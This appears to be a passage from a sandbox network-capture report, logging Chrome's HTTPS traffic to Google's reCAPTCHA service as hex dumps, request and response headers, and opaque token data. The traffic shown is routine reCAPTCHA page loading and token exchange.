                                              2024-09-27 06:18:15 UTC229INData Raw: 31 64 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63
                                              Data Ascii: 1d69<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* c
                                              2024-09-27 06:18:15 UTC1390INData Raw: 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36
                                              Data Ascii: yrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A6
                                              2024-09-27 06:18:15 UTC1390INData Raw: 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30
                                              Data Ascii: 20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E0
                                              2024-09-27 06:18:15 UTC1390INData Raw: 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71
                                              Data Ascii: ts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnq
                                              2024-09-27 06:18:15 UTC1390INData Raw: 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 37 34 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55
                                              Data Ascii: +0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYU
                                              2024-09-27 06:18:15 UTC1390INData Raw: 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f
                                              Data Ascii: 28-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/
                                              2024-09-27 06:18:15 UTC358INData Raw: 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 32 44 38 73 35 62 53 4d 67 69 59 53 6a 70 56 4a 51 58 37 71 6d 51 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 72 65 63 61 70 74 63 68 61 2e 66 72 61 6d 65 2e 4d 61 69 6e 2e 69 6e 69 74 28 22 5b 5c 78 32 32 66 69 6e 70 75 74 5c 78 32 32 2c 6e 75 6c 6c 2c 5b 5c 78 32 32 63 6f 6e 66 5c 78 32 32 2c 6e 75 6c 6c 2c 5c 78 32 32 36 4c 64 49 7a 75 59 70 41 41 41 41 41 48 54 35 6e 4b 79 71 66 5a 61 31 49 54 77 58 5f 45 57 6f 59 77 6e 46 2d 4e 68 64 5c 78 32 32 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2e 37 35 2c 6e 75 6c 6c 2c 5b 32 31 2c 31 32 35 2c 36 33 2c 37 33 2c 39 35 2c 38 37 2c 34 31 2c 34 33 2c 34 32 2c 38 33 2c 31 30 32 2c 31 30 35 2c 31 30 39 2c 31 32 31 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                              Data Ascii: ript" nonce="2D8s5bSMgiYSjpVJQX7qmQ"> recaptcha.frame.Main.init("[\x22finput\x22,null,[\x22conf\x22,null,\x226LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd\x22,0,null,null,0.75,null,[21,125,63,73,95,87,41,43,42,83,102,105,109,121],null,null,null,
                                              2024-09-27 06:18:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449777216.58.206.364433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:16 UTC863OUTPOST /recaptcha/api2/reload?k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              Content-Length: 7015
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-platform: "Windows"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Content-Type: application/x-protobuffer
                                              Accept: */*
                                              Origin: https://www.google.com
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:16 UTC7015OUTData Raw: 0a 18 78 64 73 30 72 7a 47 72 6b 74 52 38 38 75 45 5a 32 4a 55 76 64 67 4f 59 12 e4 0f 30 33 41 46 63 57 65 41 37 50 53 4c 74 49 44 64 5f 33 6c 53 58 59 65 4d 44 44 6d 73 48 41 43 61 6a 46 44 71 69 43 36 72 2d 46 6e 4c 68 65 72 79 68 33 42 63 6f 77 43 71 76 42 30 48 77 65 71 7a 6e 6e 4e 59 42 6a 6d 47 7a 69 71 36 58 34 65 34 63 7a 73 4b 6d 73 4b 63 5f 31 65 74 74 56 75 4a 66 57 31 49 64 78 70 74 66 65 45 32 4e 4e 50 6d 64 57 4b 38 30 44 55 6c 6e 37 44 33 37 6d 62 73 4c 7a 35 74 71 6f 71 77 59 48 49 37 34 79 74 59 65 5a 52 6a 5a 73 55 7a 4a 78 62 51 79 48 38 47 68 70 58 32 45 76 42 6c 73 4b 64 68 68 77 48 48 46 45 56 56 68 43 74 37 42 6e 47 42 53 67 47 78 45 70 65 47 67 69 55 4b 43 4f 49 70 35 34 6f 43 31 4c 2d 4c 54 52 55 48 54 54 58 41 4f 62 2d 46 6a 6b
                                              Data Ascii: xds0rzGrktR88uEZ2JUvdgOY03AFcWeA7PSLtIDd_3lSXYeMDDmsHACajFDqiC6r-FnLheryh3BcowCqvB0HweqznnNYBjmGziq6X4e4czsKmsKc_1ettVuJfW1IdxptfeE2NNPmdWK80DUln7D37mbsLz5tqoqwYHI74ytYeZRjZsUzJxbQyH8GhpX2EvBlsKdhhwHHFEVVhCt7BnGBSgGxEpeGgiUKCOIp54oC1L-LTRUHTTXAOb-Fjk
                                              2024-09-27 06:18:16 UTC1000INHTTP/1.1 200 OK
                                              Content-Type: application/json; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Cross-Origin-Resource-Policy: same-site
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Date: Fri, 27 Sep 2024 06:18:16 GMT
                                              Server: ESF
                                              Cache-Control: private
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              Set-Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU; Expires=Wed, 26-Mar-2025 06:18:16 GMT; Path=/recaptcha; Secure; HttpOnly; Priority=HIGH; SameSite=none
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                              Expires: Fri, 27 Sep 2024 06:18:16 GMT
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:18:16 UTC390INData Raw: 34 30 65 35 0d 0a 29 5d 7d 27 0a 5b 22 72 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 56 65 30 2d 44 6e 39 70 30 4f 2d 34 5a 4d 58 52 68 48 58 75 72 66 38 63 59 64 56 47 4b 31 57 73 49 7a 4c 65 41 4e 77 45 43 48 66 61 62 78 61 4a 4f 70 77 66 4a 43 6d 74 33 35 5a 71 72 48 49 75 6c 72 76 41 5a 61 76 6d 71 71 34 67 39 5f 4d 56 51 59 72 5f 45 42 35 6b 4a 4d 69 57 31 32 43 30 33 46 6b 38 44 7a 57 6a 76 46 33 66 38 2d 57 39 4d 4a 35 6c 57 51 7a 4b 41 33 56 44 41 5f 36 64 7a 77 2d 31 66 53 7a 4f 6b 39 34 62 78 33 35 6d 5f 36 34 44 5f 47 7a 5a 66 6e 48 48 30 41 52 6a 39 72 2d 57 6b 65 77 30 65 75 37 78 74 38 45 35 57 4f 57 62 74 69 52 67 47 53 65 56 74 49 68 42 79 49 56 70 5f 64 44 58 71 50 6a 66 63 53 5f 4d 47 70 73 74 4d 47 65 6c 62 4d 68 36 39 51 59 51 58
                                              Data Ascii: 40e5)]}'["rresp","03AFcWeA4Ve0-Dn9p0O-4ZMXRhHXurf8cYdVGK1WsIzLeANwECHfabxaJOpwfJCmt35ZqrHIulrvAZavmqq4g9_MVQYr_EB5kJMiW12C03Fk8DzWjvF3f8-W9MJ5lWQzKA3VDA_6dzw-1fSzOk94bx35m_64D_GzZfnHH0ARj9r-Wkew0eu7xt8E5WOWbtiRgGSeVtIhByIVp_dDXqPjfcS_MGpstMGelbMh69QYQX
                                              2024-09-27 06:18:16 UTC1390INData Raw: 65 46 48 75 44 6f 76 48 70 5f 36 39 41 34 33 6a 58 35 6f 32 38 50 35 50 37 48 31 43 51 6a 76 39 36 68 73 4a 4a 66 4e 59 6a 4f 46 67 6a 66 6f 78 47 65 6c 50 64 59 31 32 6c 56 7a 31 69 6c 50 77 38 56 31 6a 4b 4c 38 30 6e 74 70 54 62 54 70 74 48 6d 34 43 53 31 6d 59 45 37 77 65 6c 61 6e 33 50 44 73 4f 75 6b 6a 39 5f 51 53 79 79 77 76 79 36 30 46 41 4d 70 66 51 79 30 4b 48 47 78 67 50 44 4c 78 68 36 51 78 33 4e 46 63 74 5a 51 63 47 54 49 78 42 6e 62 63 6a 55 44 63 6c 51 32 64 63 78 69 36 65 64 65 74 61 70 49 34 4e 6d 73 75 66 43 6e 61 65 42 33 54 66 5f 4d 34 5a 2d 6f 48 31 4a 79 6d 53 4d 35 67 5a 77 38 6a 74 74 52 6b 4a 63 74 66 50 71 66 78 7a 73 41 33 68 5a 50 39 46 34 6b 55 6c 4d 5a 30 6f 44 53 57 4d 52 67 77 68 48 36 74 70 75 53 72 6b 6d 5f 67 32 50 67 41
                                              Data Ascii: eFHuDovHp_69A43jX5o28P5P7H1CQjv96hsJJfNYjOFgjfoxGelPdY12lVz1ilPw8V1jKL80ntpTbTptHm4CS1mYE7welan3PDsOukj9_QSyywvy60FAMpfQy0KHGxgPDLxh6Qx3NFctZQcGTIxBnbcjUDclQ2dcxi6edetapI4NmsufCnaeB3Tf_M4Z-oH1JymSM5gZw8jttRkJctfPqfxzsA3hZP9F4kUlMZ0oDSWMRgwhH6tpuSrkm_g2PgA
                                              2024-09-27 06:18:16 UTC1390INData Raw: 68 67 75 47 41 57 65 32 37 41 4f 4c 45 46 6c 53 33 72 6a 45 6a 6b 75 37 38 44 4b 50 39 59 47 35 6c 54 78 2d 48 4f 35 38 46 56 68 55 47 46 58 7a 38 4d 63 55 6f 5a 6d 50 77 2d 74 35 6b 58 69 54 56 59 74 6d 45 4f 79 6e 68 66 36 2d 4b 2d 71 39 31 6a 34 79 37 4e 6a 41 45 42 66 69 39 46 77 56 70 6d 4c 57 77 6a 38 72 34 52 61 73 50 63 69 6b 73 48 43 70 41 64 76 37 66 5a 5a 6a 73 34 4e 55 46 2d 41 66 4e 49 5f 49 4e 59 30 32 66 48 35 6a 4e 35 34 6c 59 73 71 63 79 4d 34 6b 6f 45 4e 36 51 59 54 58 33 48 4d 58 6e 78 4b 4d 54 75 76 39 33 44 5f 64 41 64 45 58 71 5f 75 33 64 7a 45 66 47 6b 70 38 66 68 58 75 4c 6a 69 4b 36 61 34 59 79 6c 46 52 64 30 65 48 6f 38 62 64 6f 33 47 39 58 77 2d 53 44 31 76 4b 62 5a 69 67 76 57 6d 4e 32 6b 65 36 48 39 6f 58 44 37 4c 32 4a 51 69
                                              Data Ascii: hguGAWe27AOLEFlS3rjEjku78DKP9YG5lTx-HO58FVhUGFXz8McUoZmPw-t5kXiTVYtmEOynhf6-K-q91j4y7NjAEBfi9FwVpmLWwj8r4RasPciksHCpAdv7fZZjs4NUF-AfNI_INY02fH5jN54lYsqcyM4koEN6QYTX3HMXnxKMTuv93D_dAdEXq_u3dzEfGkp8fhXuLjiK6a4YylFRd0eHo8bdo3G9Xw-SD1vKbZigvWmN2ke6H9oXD7L2JQi
                                              2024-09-27 06:18:16 UTC1390INData Raw: 69 34 36 5a 4f 38 70 4a 62 49 45 65 6e 41 4d 52 69 5f 73 47 4c 48 52 38 7a 4c 55 51 31 30 5a 4b 71 77 6c 5a 69 58 6f 6e 2d 30 47 64 79 70 48 4f 56 76 61 71 6f 66 72 4a 4c 76 67 41 6b 4a 51 33 35 42 34 48 48 31 6b 4a 65 49 31 66 55 56 74 65 67 4a 65 69 73 55 4f 7a 6a 4d 6e 43 66 61 7a 48 73 38 73 71 5a 64 2d 44 56 39 42 52 6c 59 6d 73 46 6e 35 63 6e 72 6d 77 62 49 54 49 64 63 73 64 57 4a 69 51 59 4d 4e 4d 49 77 50 5f 79 43 79 47 33 7a 2d 55 34 35 58 54 66 46 6e 70 51 6f 75 38 64 78 7a 61 71 55 6f 33 52 2d 53 37 71 4d 77 57 41 6a 49 41 56 43 34 63 57 52 6a 76 49 70 54 4c 75 73 45 6d 5f 32 57 35 66 76 73 78 36 43 66 59 53 51 72 4b 57 63 33 31 66 2d 74 48 70 4f 32 38 49 66 75 61 7a 34 41 74 48 48 62 42 41 71 51 37 79 6b 67 78 74 44 72 70 72 51 59 56 58 74 36
                                              Data Ascii: i46ZO8pJbIEenAMRi_sGLHR8zLUQ10ZKqwlZiXon-0GdypHOVvaqofrJLvgAkJQ35B4HH1kJeI1fUVtegJeisUOzjMnCfazHs8sqZd-DV9BRlYmsFn5cnrmwbITIdcsdWJiQYMNMIwP_yCyG3z-U45XTfFnpQou8dxzaqUo3R-S7qMwWAjIAVC4cWRjvIpTLusEm_2W5fvsx6CfYSQrKWc31f-tHpO28Ifuaz4AtHHbBAqQ7ykgxtDrprQYVXt6
                                              2024-09-27 06:18:16 UTC1390INData Raw: 79 39 46 53 6d 52 73 62 30 68 30 5a 56 5a 34 63 6d 70 53 53 30 34 76 54 57 52 54 4f 46 4e 48 51 55 52 56 4b 31 68 44 57 58 5a 54 59 6b 68 69 52 44 52 6a 61 30 74 34 54 56 56 6e 55 57 56 45 59 55 6c 34 57 57 73 33 56 33 4e 51 53 57 6c 72 5a 55 56 4f 52 44 52 72 4f 46 5a 4d 65 55 68 4b 51 6e 6c 6d 64 44 52 31 4d 30 6b 35 63 6b 73 76 51 6b 46 76 53 46 5a 6c 52 6e 52 47 54 30 46 58 52 6d 56 30 54 32 5a 6d 64 6c 49 35 53 47 52 6c 55 30 56 7a 62 6b 74 49 61 6a 4a 50 65 48 49 72 4d 6e 42 6f 55 58 4e 7a 63 58 42 74 61 6d 70 4b 51 33 6c 52 4d 45 4e 76 63 47 5a 58 4f 44 64 4b 52 6e 56 35 4e 6b 4e 58 56 53 74 4a 53 55 6f 34 51 6d 78 49 65 46 68 78 53 6c 5a 6e 54 32 52 69 65 47 39 31 54 69 74 46 4c 30 30 31 57 6e 4a 7a 4d 7a 46 4e 62 6a 56 79 5a 6c 42 4b 52 32 5a 30
                                              Data Ascii: y9FSmRsb0h0ZVZ4cmpSS04vTWRTOFNHQURVK1hDWXZTYkhiRDRja0t4TVVnUWVEYUl4WWs3V3NQSWlrZUVORDRrOFZMeUhKQnlmdDR1M0k5cksvQkFvSFZlRnRGT0FXRmV0T2ZmdlI5SGRlU0VzbktIajJPeHIrMnBoUXNzcXBtampKQ3lRMENvcGZXODdKRnV5NkNXVStJSUo4QmxIeFhxSlZnT2RieG91TitFL001WnJzMzFNbjVyZlBKR2Z0
                                              2024-09-27 06:18:16 UTC1390INData Raw: 49 64 48 41 7a 4e 45 68 79 54 79 39 6c 51 6d 70 55 59 58 70 43 52 6b 68 33 54 6c 59 34 64 57 4e 48 5a 45 39 50 57 44 56 75 59 57 6b 79 4b 30 46 42 51 33 5a 6f 57 6d 4e 5a 54 44 4a 56 65 48 55 30 62 48 6b 33 4e 6b 31 35 65 69 39 6b 65 6a 5a 5a 53 7a 4a 36 4d 7a 46 57 59 33 64 30 4d 57 4a 4e 54 69 74 32 51 33 4e 70 57 6d 46 6f 59 57 31 46 54 57 55 32 5a 46 6c 70 4d 55 5a 7a 54 6a 42 75 56 57 70 31 51 31 4a 52 52 6d 39 75 59 6e 42 4f 53 57 45 31 4c 30 46 6a 52 57 59 72 64 48 6c 76 53 55 6c 36 56 58 68 79 52 46 52 4c 53 6c 4e 56 59 6c 70 57 61 54 49 30 54 31 4a 55 54 45 74 42 59 6b 31 4a 4d 32 5a 71 52 31 68 56 4e 46 5a 51 57 46 6c 6f 53 58 5a 6a 63 7a 42 61 64 45 31 74 55 7a 4e 44 62 54 5a 4c 4e 46 4a 74 52 47 46 34 51 55 77 7a 4e 57 74 61 62 7a 4e 4a 55 6d
                                              Data Ascii: IdHAzNEhyTy9lQmpUYXpCRkh3TlY4dWNHZE9PWDVuYWkyK0FBQ3ZoWmNZTDJVeHU0bHk3Nk15ei9kejZZSzJ6MzFWY3d0MWJNTit2Q3NpWmFoYW1FTWU2ZFlpMUZzTjBuVWp1Q1JRRm9uYnBOSWE1L0FjRWYrdHlvSUl6VXhyRFRLSlNVYlpWaTI0T1JUTEtBYk1JM2ZqR1hVNFZQWFloSXZjczBadE1tUzNDbTZLNFJtRGF4QUwzNWtabzNJUm
                                              2024-09-27 06:18:16 UTC1390INData Raw: 6a 6c 75 52 30 56 33 59 56 4e 44 62 32 4d 31 62 46 56 45 65 58 68 4c 54 57 55 77 56 6c 4a 72 62 48 46 53 62 6d 74 76 53 32 78 44 56 58 68 71 64 46 52 54 4d 48 52 56 52 45 34 77 56 57 55 33 64 57 74 78 54 7a 56 4d 63 46 4a 31 59 30 46 52 63 48 42 57 56 6d 31 6f 56 6e 42 54 53 6b 56 57 4f 45 78 69 53 45 45 30 51 7a 52 6d 5a 45 52 6f 56 7a 67 33 59 58 45 33 4e 55 68 31 54 6e 59 7a 61 6b 70 71 4b 31 4a 54 59 54 46 44 53 32 59 72 61 54 46 75 55 48 5a 4d 63 69 74 53 64 6a 42 4c 5a 54 68 78 4e 6b 4d 35 5a 31 4a 49 54 30 73 79 55 6e 42 44 56 6b 68 5a 55 56 59 72 4e 6b 74 54 4c 30 45 77 64 6a 52 58 52 6d 39 42 4d 58 52 6e 59 6c 64 77 52 45 59 78 56 6b 70 49 56 45 56 42 54 46 68 69 53 6a 4a 52 5a 54 59 30 51 32 35 31 57 44 4a 6a 64 32 4a 69 63 55 6c 56 59 56 70 74
                                              Data Ascii: jluR0V3YVNDb2M1bFVEeXhLTWUwVlJrbHFSbmtvS2xDVXhqdFRTMHRVRE4wVWU3dWtxTzVMcFJ1Y0FRcHBWVm1oVnBTSkVWOExiSEE0QzRmZERoVzg3YXE3NUh1TnYzakpqK1JTYTFDS2YraTFuUHZMcitSdjBLZThxNkM5Z1JIT0syUnBDVkhZUVYrNktTL0EwdjRXRm9BMXRnYldwREYxVkpIVEVBTFhiSjJRZTY0Q251WDJjd2JicUlVYVpt
                                              2024-09-27 06:18:16 UTC1390INData Raw: 79 63 7a 42 6c 51 30 4a 78 53 45 35 34 4c 32 52 6d 55 6e 6f 35 64 47 70 53 62 32 46 49 61 44 42 5a 4f 54 56 55 63 33 4e 78 64 6a 64 58 64 54 42 77 4f 45 4e 32 63 45 73 77 64 6b 46 73 51 6a 4e 72 4e 58 6c 78 54 6b 64 58 52 6e 46 52 5a 32 52 58 5a 33 68 56 5a 30 55 7a 4e 48 56 70 4f 55 68 6b 5a 56 59 79 63 31 5a 4e 4e 32 39 51 56 48 68 30 59 7a 68 44 4d 7a 41 77 53 47 78 52 5a 6b 6f 79 4c 30 4e 68 4f 44 64 35 59 57 64 59 53 6b 64 33 56 32 4a 49 65 58 56 55 62 46 4e 46 61 48 42 73 62 45 59 34 54 44 5a 6f 65 45 4e 4f 65 45 35 42 51 30 31 4f 52 31 5a 56 52 6a 4e 49 5a 30 46 51 57 6a 4a 43 53 45 52 69 53 48 6c 49 4e 7a 6c 70 53 53 74 45 52 6a 5a 6b 57 55 64 4f 4d 44 56 50 61 57 68 54 53 46 52 42 54 30 52 52 65 6d 70 36 4e 48 64 33 4c 31 59 34 52 6e 5a 44 51 6e
                                              Data Ascii: yczBlQ0JxSE54L2RmUno5dGpSb2FIaDBZOTVUc3NxdjdXdTBwOEN2cEswdkFsQjNrNXlxTkdXRnFRZ2RXZ3hVZ0UzNHVpOUhkZVYyc1ZNN29QVHh0YzhDMzAwSGxRZkoyL0NhODd5YWdYSkd3V2JIeXVUbFNFaHBsbEY4TDZoeENOeE5BQ01OR1ZVRjNIZ0FQWjJCSERiSHlINzlpSStERjZkWUdOMDVPaWhTSFRBT0RRemp6NHd3L1Y4RnZDQn
